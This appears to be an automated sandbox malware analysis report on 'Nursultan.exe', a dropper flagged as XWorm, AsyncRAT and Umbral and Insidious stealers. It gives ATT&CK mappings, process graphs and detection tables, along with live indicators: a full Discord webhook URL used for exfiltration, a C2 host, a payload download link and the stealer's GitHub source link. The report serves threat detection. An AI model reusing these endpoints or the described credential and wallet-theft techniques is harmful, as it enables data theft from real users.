                            Source: Yara matchFile source: 00000000.00000002.2042796854.0000000012898000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000000.2041682947.0000000000B82000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.3293638320.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000003.00000002.3336137166.0000000012EF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: Nursultan.exe PID: 764, type: MEMORYSTR
                            Source: Yara matchFile source: Process Memory Space: Microsoft Edge.exe PID: 3056, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft Edge, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe, type: DROPPED

                            Mitre Att&ck Matrix

                            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                            Gather Victim Identity Information1
                            Scripting                            		Valid Accounts131
                            Windows Management Instrumentation                            		1
                            Scripting                            		1
                            DLL Side-Loading                            		1
                            File and Directory Permissions Modification                            		1
                            OS Credential Dumping                            		1
                            File and Directory Discovery                            		Remote Services11
                            Archive Collected Data                            		3
                            Ingress Tool Transfer                            		Exfiltration Over Other Network MediumAbuse Accessibility Features
                            CredentialsDomainsDefault Accounts1
                            Command and Scripting Interpreter                            		1
                            DLL Side-Loading                            		11
                            Process Injection                            		21
                            Disable or Modify Tools                            		LSASS Memory34
                            System Information Discovery                            		Remote Desktop Protocol3
                            Data from Local System                            		11
                            Encrypted Channel                            		Exfiltration Over BluetoothNetwork Denial of Service
                            Email AddressesDNS ServerDomain Accounts1
                            PowerShell                            		121
                            Registry Run Keys / Startup Folder                            		121
                            Registry Run Keys / Startup Folder                            		1
                            Deobfuscate/Decode Files or Information                            		Security Account Manager1
                            Query Registry                            		SMB/Windows Admin Shares1
                            Screen Capture                            		1
                            Non-Standard Port                            		Automated ExfiltrationData Encrypted for Impact
                            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook21
                            Obfuscated Files or Information                            		NTDS551
                            Security Software Discovery                            		Distributed Component Object ModelInput Capture4
                            Non-Application Layer Protocol                            		Traffic DuplicationData Destruction
                            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script22
                            Software Packing                            		LSA Secrets1
                            Process Discovery                            		SSHKeylogging15
                            Application Layer Protocol                            		Scheduled TransferData Encrypted for Impact
                            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                            Timestomp                            		Cached Domain Credentials161
                            Virtualization/Sandbox Evasion                            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                            DLL Side-Loading                            		DCSync1
                            Application Window Discovery                            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                            Masquerading                            		Proc Filesystem1
                            Remote System Discovery                            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt161
                            Virtualization/Sandbox Evasion                            		/etc/passwd and /etc/shadow1
                            System Network Configuration Discovery                            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron11
                            Process Injection                            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                            Behavior Graph

                            Hide Legend

                            Legend:

                            • Process
                            • Signature
                            • Created File
                            • DNS/IP Info
                            • Is Dropped
                            • Is Windows Process
                            • Number of created Registry Values
                            • Number of created Files
                            • Visual Basic
                            • Delphi
                            • Java
                            • .Net C# or VB.NET
                            • C, C++ or other language
                            • Is malicious
                            • Internet
                            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1505919 Sample: Nursultan.exe Startdate: 07/09/2024 Architecture: WINDOWS Score: 100 147 freegeoip.app 2->147 149 stage-von.gl.at.ply.gg 2->149 151 3 other IPs or domains 2->151 163 Suricata IDS alerts for network traffic 2->163 165 Found malware configuration 2->165 167 Malicious sample detected (through community Yara rule) 2->167 171 28 other signatures 2->171 14 Nursultan.exe 4 2->14         started        signatures3 169 Tries to detect the country of the analysis system (by using the IP) 147->169 process4 file5 141 C:\Users\user\AppData\Local\...141ursultan.exe, PE32 14->141 dropped 143 C:\Users\user\AppData\...\Microsoft Edge.exe, PE32 14->143 dropped 145 C:\Users\user\AppData\...145ursultan.exe.log, CSV 14->145 dropped 219 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 14->219 18 Nursultan.exe 2 14->18         started        22 Microsoft Edge.exe 15 6 14->22         started        25 Conhost.exe 14->25         started        signatures6 process7 dnsIp8 129 C:\Users\user\AppData\...129ursultan2.exe, PE32 18->129 dropped 173 Antivirus detection for dropped file 18->173 175 Multi AV Scanner detection for dropped file 18->175 177 Machine Learning detection for dropped file 18->177 27 Nursultan2.exe 5 18->27         started        31 Nursultan.exe 1 18->31         started        159 ip-api.com 208.95.112.1, 49704, 49708, 49731 TUT-ASUS United States 22->159 161 stage-von.gl.at.ply.gg 147.185.221.22, 19496, 49728, 49733 SALSGIVERUS United States 22->161 131 C:\Users\user\AppData\...\Microsoft Edge, PE32 22->131 dropped 179 Protects its processes via BreakOnTermination flag 22->179 181 Adds a directory exclusion to Windows Defender 22->181 33 powershell.exe 22->33         started        file9 signatures10 process11 file12 137 C:\Users\user\AppData\Local\Temp\Umbral.exe, PE32 27->137 dropped 139 C:\Users\user\AppData\Local\...\Insidious.exe, PE32 27->139 dropped 205 Antivirus detection for dropped file 27->205 207 Multi AV Scanner detection for dropped file 27->207 209 Machine Learning detection for dropped file 27->209 211 Found many strings related to Crypto-Wallets (likely being stolen) 27->211 35 Umbral.exe 27->35         started        40 Insidious.exe 27->40         started        42 cmd.exe 27->42         started        44 Microsoft Edge.exe 27->44         started        46 Nursultan.exe 31->46         started        48 Nursultan2.exe 31->48         started        213 Loading BitLocker PowerShell Module 33->213 50 conhost.exe 33->50         started        signatures13 process14 dnsIp15 153 discord.com 162.159.135.232, 443, 49732, 49738 CLOUDFLARENETUS United States 35->153 133 C:\ProgramData\Microsoft\...\uOWQK.scr, PE32 35->133 dropped 135 C:\Windows\System32\drivers\etc\hosts, ASCII 35->135 dropped 187 Antivirus detection for dropped file 35->187 189 Multi AV Scanner detection for dropped file 35->189 191 Machine Learning detection for dropped file 35->191 203 5 other signatures 35->203 52 powershell.exe 35->52         started        55 WMIC.exe 35->55         started        65 2 other processes 35->65 155 freegeoip.app 188.114.97.3, 443, 49705, 49715 CLOUDFLARENETUS European Union 40->155 157 ipbase.com 104.21.85.189, 443, 49707, 49716 CLOUDFLARENETUS United States 40->157 193 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 40->193 195 Found many strings related to Crypto-Wallets (likely being stolen) 40->195 197 Tries to harvest and steal browser information (history, passwords, etc) 40->197 199 Tries to steal Crypto Currency Wallets 40->199 201 Passes commands via pipe to a shell (likely to bypass AV or HIPS) 42->201 57 cmd.exe 42->57         started        67 4 other processes 42->67 59 Nursultan.exe 46->59         started        61 Nursultan2.exe 46->61         started        63 cmd.exe 48->63         started        69 4 other processes 48->69 file16 signatures17 process18 signatures19 183 Loading BitLocker PowerShell Module 52->183 71 conhost.exe 52->71         started        73 conhost.exe 55->73         started        82 2 other processes 57->82 75 Nursultan2.exe 59->75         started        84 2 other processes 59->84 77 cmd.exe 61->77         started        86 3 other processes 61->86 185 Passes commands via pipe to a shell (likely to bypass AV or HIPS) 63->185 88 5 other processes 63->88 80 conhost.exe 65->80         started        process20 signatures21 90 Conhost.exe 71->90         started        92 cmd.exe 75->92         started        103 3 other processes 75->103 217 Passes commands via pipe to a shell (likely to bypass AV or HIPS) 77->217 95 cmd.exe 77->95         started        105 3 other processes 77->105 97 Nursultan2.exe 84->97         started        99 Nursultan.exe 84->99         started        101 cmd.exe 88->101         started        107 2 other processes 88->107 process22 signatures23 215 Passes commands via pipe to a shell (likely to bypass AV or HIPS) 92->215 109 cmd.exe 92->109         started        111 conhost.exe 92->111         started        113 chcp.com 92->113         started        115 timeout.exe 92->115         started        117 cmd.exe 95->117         started        119 cmd.exe 95->119         started        121 cmd.exe 97->121         started        123 Conhost.exe 99->123         started        process24 process25 125 cmd.exe 109->125         started        127 cmd.exe 109->127         started       

                            Screenshots

                            Thumbnails

                            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                            windows-stand

                            Antivirus, Machine Learning and Genetic Malware Detection

                            Initial Sample

                            SourceDetectionScannerLabelLink
                            Nursultan.exe82%ReversingLabsByteCode-MSIL.Trojan.XWormRAT
                            Nursultan.exe100%AviraTR/Dropper.Gen
                            Nursultan.exe100%Joe Sandbox ML

                            Dropped Files

                            SourceDetectionScannerLabelLink
                            C:\Users\user\AppData\Local\Temp\Insidious.exe100%AviraHEUR/AGEN.1307065
                            C:\Users\user\AppData\Local\Temp\Nursultan2.exe100%AviraTR/Dropper.Gen
                            C:\Users\user\AppData\Roaming\Microsoft Edge100%AviraTR/Spy.Gen
                            C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe100%AviraTR/Spy.Gen
                            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uOWQK.scr100%AviraHEUR/AGEN.1307507
                            C:\Users\user\AppData\Local\Temp\Nursultan.exe100%AviraTR/Dropper.Gen
                            C:\Users\user\AppData\Local\Temp\Umbral.exe100%AviraHEUR/AGEN.1307507
                            C:\Users\user\AppData\Local\Temp\Insidious.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\Nursultan2.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Roaming\Microsoft Edge100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe100%Joe Sandbox ML
                            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uOWQK.scr100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\Nursultan.exe100%Joe Sandbox ML
                            C:\Users\user\AppData\Local\Temp\Umbral.exe100%Joe Sandbox ML
                            C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uOWQK.scr92%ReversingLabsByteCode-MSIL.Trojan.UmbralStealer
                            C:\Users\user\AppData\Local\Temp\Insidious.exe88%ReversingLabsByteCode-MSIL.Infostealer.Stealgen
                            C:\Users\user\AppData\Local\Temp\Microsoft Edge.exe84%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                            C:\Users\user\AppData\Local\Temp\Nursultan.exe92%ReversingLabsByteCode-MSIL.Trojan.XWormRAT
                            C:\Users\user\AppData\Local\Temp\Nursultan2.exe88%ReversingLabsByteCode-MSIL.Trojan.XWormRAT
                            C:\Users\user\AppData\Local\Temp\Umbral.exe92%ReversingLabsByteCode-MSIL.Trojan.UmbralStealer
                            C:\Users\user\AppData\Roaming\Microsoft Edge84%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT

                            Unpacked PE Files

                            No Antivirus matches

                            Domains

                            No Antivirus matches

                            URLs

                            SourceDetectionScannerLabelLink
                            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
                            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
                            https://discord.com/api/webhooks/1277266868607909908/QiJcGAwDqWNtmVvOEAXbQRof-6-EayQHWtIisK36ihRezCI0%Avira URL Cloudsafe
                            https://mail.google.com/mail/installwebapp?usp=chrome_default0%Avira URL Cloudsafe
                            https://docs.google.com/document/J0%Avira URL Cloudsafe
                            https://discordapp.com/api/v9/users/0%Avira URL Cloudsafe
                            https://docs.google.com/presentation/J0%Avira URL Cloudsafe
                            stage-von.gl.at.ply.gg0%Avira URL Cloudsafe
                            https://contoso.com/License0%Avira URL Cloudsafe
                            https://www.youtube.com/:0%Avira URL Cloudsafe
                            https://mail.google.com/mail/?usp=installed_webapp0%Avira URL Cloudsafe
                            https://drive.google.com/drive/installwebapp?usp=chrome_default0%Avira URL Cloudsafe
                            https://freegeoip.app0%Avira URL Cloudsafe
                            https://media.discordapp.net/attachments/1277266726186385433/1281762825542303845/Umbral-927537.zip?e0%Avira URL Cloudsafe
                            https://docs.google.com/document/installwebapp?usp=chrome_default0%Avira URL Cloudsafe
                            https://mail.google.com/mail/:0%Avira URL Cloudsafe
                            https://docs.google.com/document/:0%Avira URL Cloudsafe
                            http://discord.com0%Avira URL Cloudsafe
                            https://docs.google.com/spreadsheets/J0%Avira URL Cloudsafe
                            https://docs.google.com/presentation/installwebapp?usp=chrome_default0%Avira URL Cloudsafe
                            https://docs.google.com/presentation/:0%Avira URL Cloudsafe
                            https://answers.netlify.com/t/support-guide-i-ve-deployed-my-site-but-i-still-see-page-not-found/1250%Avira URL Cloudsafe
                            https://docs.google.com/presentation/installwebapp?usp=chr.0%Avira URL Cloudsafe
                            https://0.0.0.00%Avira URL Cloudsafe
                            https://docs.google.com/spreadsheets/?usp=installed_webapp0%Avira URL Cloudsafe
                            http://ipbase.com0%Avira URL Cloudsafe
                            https://mail.google.com/mail/J0%Avira URL Cloudsafe
                            https://api.vimeworld.ru/u0%Avira URL Cloudsafe
                            http://x1.i.lencr.org/00%Avira URL Cloudsafe
                            https://freegeoip.app/xml/80%Avira URL Cloudsafe
                            http://x1.c.lencr.org/00%Avira URL Cloudsafe
                            https://contoso.com/0%Avira URL Cloudsafe
                            https://github.com/Blank-c/Umbral-Steal0%Avira URL Cloudsafe
                            https://drive.google.com/?lfhs=20%Avira URL Cloudsafe
                            https://nuget.org/nuget.exe0%Avira URL Cloudsafe
                            https://docs.google.com/spreadsheets/:0%Avira URL Cloudsafe
                            http://ip-api.com0%Avira URL Cloudsafe
                            https://ipbase.com0%Avira URL Cloudsafe
                            https://api.vimeworld.ru/user/name/0%Avira URL Cloudsafe
                            https://www.youtube.com/s/notifications/manifest/cr_install.html0%Avira URL Cloudsafe
                            https://api.vimeworld.ru/user/name/5https://freegeoip.app/xml/0%Avira URL Cloudsafe
                            https://www.youtube.com/?feature=ytca0%Avira URL Cloudsafe
                            http://freegeoip.app0%Avira URL Cloudsafe
                            https://www.youtube.com/J0%Avira URL Cloudsafe
                            https://freegeoip.app/xml/0%Avira URL Cloudsafe
                            https://discord.com/api/v10/users/0%Avira URL Cloudsafe
                            http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-0%Avira URL Cloudsafe
                            http://nuget.org/NuGet.exe0%Avira URL Cloudsafe
                            https://discord.com0%Avira URL Cloudsafe
                            https://drive.google.com/:0%Avira URL Cloudsafe
                            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
                            http://pesterbdd.com/images/Pester.png0%Avira URL Cloudsafe
                            http://schemas.xmlsoap.org/soap/encoding/0%Avira URL Cloudsafe
                            https://steamcommunity.com/profiles/ASOFTWARE0%Avira URL Cloudsafe
                            https://discord.comyhl80%Avira URL Cloudsafe
                            https://github.com/Blank-c/Umbral-Stealerh0%Avira URL Cloudsafe
                            http://crl.rootca1.amazontrust.com/rootca1.crl00%Avira URL Cloudsafe
                            https://media.discordapp.net/attachments/1277266726186385433/128176282554=0%Avira URL Cloudsafe
                            https://contoso.com/Icon0%Avira URL Cloudsafe
                            http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
                            http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
                            https://drive.google.com/J0%Avira URL Cloudsafe
                            https://www.ecosia.org/newtab/0%Avira URL Cloudsafe
                            https://discord.com/api/webhooks/1277266868607909908/QiJcGAwDqWNtmVvOEAXbQRof-6-EayQHWtIisK36ihRezCI8pq0CiZEozVxo5r80Fkm90%Avira URL Cloudsafe
                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%Avira URL Cloudsafe
                            https://media.discordapp.net/attachments/1277266726186385433/1281762825540%Avira URL Cloudsafe
                            https://ac.ecosia.org/autocomplete?q=0%Avira URL Cloudsafe
                            https://github.com/Blank-c/Umbral-Stealer0%Avira URL Cloudsafe
                            https://github.com/Pester/Pester0%Avira URL Cloudsafe
                            https://drive.0b0%Avira URL Cloudsafe
                            https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default0%Avira URL Cloudsafe
                            https://docs.google.com/presentation/installwebapp?usp=chr0%Avira URL Cloudsafe
                            http://schemas.xmlsoap.org/wsdl/0%Avira URL Cloudsafe
                            https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL0%Avira URL Cloudsafe
                            http://crt.rootca1.amazontrust.com/rootca1.cer0?0%Avira URL Cloudsafe
                            https://ipbase.com/xml/0%Avira URL Cloudsafe
                            https://cdn.discordapp.com/attachments/1277266726186385433/1281762825542303845/Umbral-927537.zip?ex=0%Avira URL Cloudsafe
                            https://docs.google.com/presentation/?usp=installed_webapp0%Avira URL Cloudsafe
                            https://docs.google.com/presentation/installwebapp?usp=chro0b0%Avira URL Cloudsafe
                            https://aka.ms/pscore680%Avira URL Cloudsafe
                            https://support.mozilla.org0%Avira URL Cloudsafe
                            https://docs.google.com/document/?usp=installed_webapp0%Avira URL Cloudsafe
                            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%Avira URL Cloudsafe
                            http://ip-api.com/json/?fielH0%Avira URL Cloudsafe
                            http://ip-api.com/line/?fields=hosting0%Avira URL Cloudsafe
                            http://ip-api.com/json/?fields=2255450%Avira URL Cloudsafe

                            Domains and IPs

                            Contacted Domains

                            NameIPActiveMaliciousAntivirus DetectionReputation
                            discord.com
                            		162.159.135.232
                            		truetrue
                              		unknown
                              ip-api.com
                              		208.95.112.1
                              		truetrue
                                		unknown
                                ipbase.com
                                		104.21.85.189
                                		truefalse
                                  		unknown
                                  freegeoip.app
                                  		188.114.97.3
                                  		truetrue
                                    		unknown
                                    stage-von.gl.at.ply.gg
                                    		147.185.221.22
                                    		truetrue
                                      		unknown

                                      Contacted URLs

                                      NameMaliciousAntivirus DetectionReputation
                                      stage-von.gl.at.ply.ggtrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://freegeoip.app/xml/false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://discord.com/api/webhooks/1277266868607909908/QiJcGAwDqWNtmVvOEAXbQRof-6-EayQHWtIisK36ihRezCI8pq0CiZEozVxo5r80Fkm9true
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://ipbase.com/xml/false
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://ip-api.com/line/?fields=hostingfalse
                                      • Avira URL Cloud: safe
                                      		unknown

                                      URLs from Memory and Binaries

                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://discord.com/api/webhooks/1277266868607909908/QiJcGAwDqWNtmVvOEAXbQRof-6-EayQHWtIisK36ihRezCIUmbral.exe, 0000003D.00000002.2205074841.00000232B9D71000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe.4.drtrue
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://duckduckgo.com/chrome_newtabInsidious.exe, 0000000B.00000002.2237867422.00000245226D2000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000002.2237867422.00000245226ED000.00000004.00000800.00020000.00000000.sdmp, tmp2876.tmp.dat.11.dr, tmp2855.tmp.dat.11.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://mail.google.com/mail/?usp=installed_webappUmbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://duckduckgo.com/ac/?q=Insidious.exe, 0000000B.00000002.2237867422.00000245226D2000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000002.2237867422.00000245226ED000.00000004.00000800.00020000.00000000.sdmp, tmp2876.tmp.dat.11.dr, tmp2855.tmp.dat.11.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://mail.google.com/mail/installwebapp?usp=chrome_defaultUmbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://docs.google.com/presentation/JUmbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://docs.google.com/document/JUmbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://drive.google.com/drive/installwebapp?usp=chrome_defaultUmbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://contoso.com/Licensepowershell.exe, 0000002D.00000002.2407960339.000001AB25905000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://discordapp.com/api/v9/users/Nursultan2.exe, 00000004.00000002.2106362041.0000000012F48000.00000004.00000800.00020000.00000000.sdmp, Nursultan2.exe, 00000004.00000002.2105694869.0000000002F41000.00000004.00000800.00020000.00000000.sdmp, Nursultan2.exe, 0000000A.00000002.2130667385.0000000002901000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000000.2100966831.000001DCB4052000.00000002.00000001.01000000.0000000A.sdmp, uOWQK.scr.14.dr, Umbral.exe.4.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.youtube.com/:Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://freegeoip.appInsidious.exe, 0000000B.00000002.2166607567.0000024512696000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://discord.comUmbral.exe, 0000000E.00000002.2590100139.000001DCB6724000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6749000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=Insidious.exe, 0000000B.00000002.2237867422.00000245226D2000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000002.2237867422.00000245226ED000.00000004.00000800.00020000.00000000.sdmp, tmp2876.tmp.dat.11.dr, tmp2855.tmp.dat.11.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://mail.google.com/mail/:Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://media.discordapp.net/attachments/1277266726186385433/1281762825542303845/Umbral-927537.zip?eUmbral.exe, 0000000E.00000002.2590100139.000001DCB5E5F000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://docs.google.com/document/installwebapp?usp=chrome_defaultUmbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://docs.google.com/presentation/:Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://docs.google.com/presentation/installwebapp?usp=chrome_defaultUmbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://docs.google.com/document/:Umbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://docs.google.com/spreadsheets/JUmbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://answers.netlify.com/t/support-guide-i-ve-deployed-my-site-but-i-still-see-page-not-found/125Insidious.exe, 0000000B.00000002.2166607567.0000024512751000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000002.2166607567.00000245126D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://docs.google.com/presentation/installwebapp?usp=chr.Umbral.exe, 0000000E.00000002.2590100139.000001DCB638C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://0.0.0.0nursultan.bat.4.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://docs.google.com/spreadsheets/?usp=installed_webappUmbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://mail.google.com/mail/JUmbral.exe, 0000000E.00000002.2590100139.000001DCB615F000.00000004.00000800.00020000.00000000.sdmp, Umbral.exe, 0000000E.00000002.2590100139.000001DCB6342000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://ipbase.comInsidious.exe, 0000000B.00000002.2166607567.00000245126F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://api.vimeworld.ru/uInsidious.exe, 0000000B.00000002.2166607567.0000024512651000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://freegeoip.app/xml/8Insidious.exe, 00000017.00000002.2134605998.000002ACD01C1000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 00000026.00000002.2168782168.000001CFADD31000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 00000038.00000002.2206155033.00000220C94C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://x1.c.lencr.org/0cert9.db.11.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://x1.i.lencr.org/0cert9.db.11.drfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchInsidious.exe, 0000000B.00000002.2237867422.00000245226D2000.00000004.00000800.00020000.00000000.sdmp, Insidious.exe, 0000000B.00000002.2237867422.00000245226ED000.00000004.00000800.00020000.00000000.sdmp, tmp2876.tmp.dat.11.dr, tmp2855.tmp.dat.11.drfalse
                                      • URL Reputation: safe
                                      		unknown
                                      https://contoso.com/powershell.exe, 0000002D.00000002.2407960339.000001AB25905000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://github.com/Blank-c/Umbral-StealUmbral.exe, 0000000E.00000002.2590100139.000001DCB6724000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
